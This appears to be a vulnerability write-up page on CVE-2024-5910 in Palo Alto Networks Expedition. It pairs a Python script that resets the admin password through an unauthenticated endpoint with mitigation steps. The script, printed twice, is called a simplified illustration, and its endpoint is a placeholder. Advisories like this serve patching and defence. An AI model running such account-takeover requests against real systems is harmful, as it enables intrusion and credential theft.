Exploiting Missing Authentication in Palo Alto Networks Expedition

CVE-2024-5910, 10 Nov 2024

CVE-2024-5910 is a critical vulnerability in the Palo Alto Networks Expedition tool, which is used for firewall configuration migration and management. This vulnerability arises from missing authentication for a critical function, allowing an attacker with network access to take over an Expedition admin account. Once exploited, attackers can gain access to sensitive configuration secrets, credentials, and other data stored within the tool.

Exploit Details

The vulnerability can be exploited by sending a specially crafted request to an exposed endpoint, which resets the admin password. Here’s a simplified example of how the exploit might work:

Identify the Vulnerable Endpoint: The attacker identifies an exposed endpoint in the Expedition tool that lacks proper authentication.
Craft the Exploit Request: The attacker crafts a request to reset the admin password. This can be done using a simple HTTP request.

python

import requests

# URL of the vulnerable endpoint
url = "http://<target-expedition-server>/reset_admin_password"

# Crafting the exploit payload
payload = {
    "new_password": "NewSecurePassword123!"
}

# Sending the exploit request
response = requests.post(url, data=payload)

# Checking the response
if response.status_code == 200:
    print("Admin password reset successfully!")
else:
    print("Failed to reset admin password.")

Execute the Exploit: The attacker sends the crafted request to the vulnerable endpoint. If successful, the admin password is reset to a new value controlled by the attacker.
Gain Access: With the new admin password, the attacker can log in to the Expedition tool and access sensitive data, including configuration secrets and credentials.

Mitigation

To mitigate this vulnerability, it is essential to:

Update Expedition: Upgrade to Expedition version 1.2.92 or later, where the vulnerability has been fixed.
Restrict Network Access: Ensure that network access to the Expedition installation is restricted to authorized users, hosts, or networks.
Monitor for Indicators of Compromise: Regularly check for any signs of exploitation and take immediate action if any are found.

You can find the proof-of-concept (PoC) exploit for CVE-2024-5910 on GitHub. Here is the link to the repository:

Warning: All information on this page is provided solely for understanding the CVE-2024-5910 vulnerability and applying the patch as soon as possible. Unauthorized use of this information for any other purpose is strictly prohibited. Failure to apply the patch immediately may result in severe security risks, including unauthorized access and data theft.

For applying the patch for CVE-2024-5910, you can refer to the following link:

Last updated 6 months ago

Was this helpful?

import requests # URL of the vulnerable endpoint url = "http://<target-expedition-server>/reset_admin_password" # Crafting the exploit payload payload = { "new_password": "NewSecurePassword123!" } # Sending the exploit request response = requests.post(url, data=payload) # Checking the response if response.status_code == 200: print("Admin password reset successfully!") else: print("Failed to reset admin password.")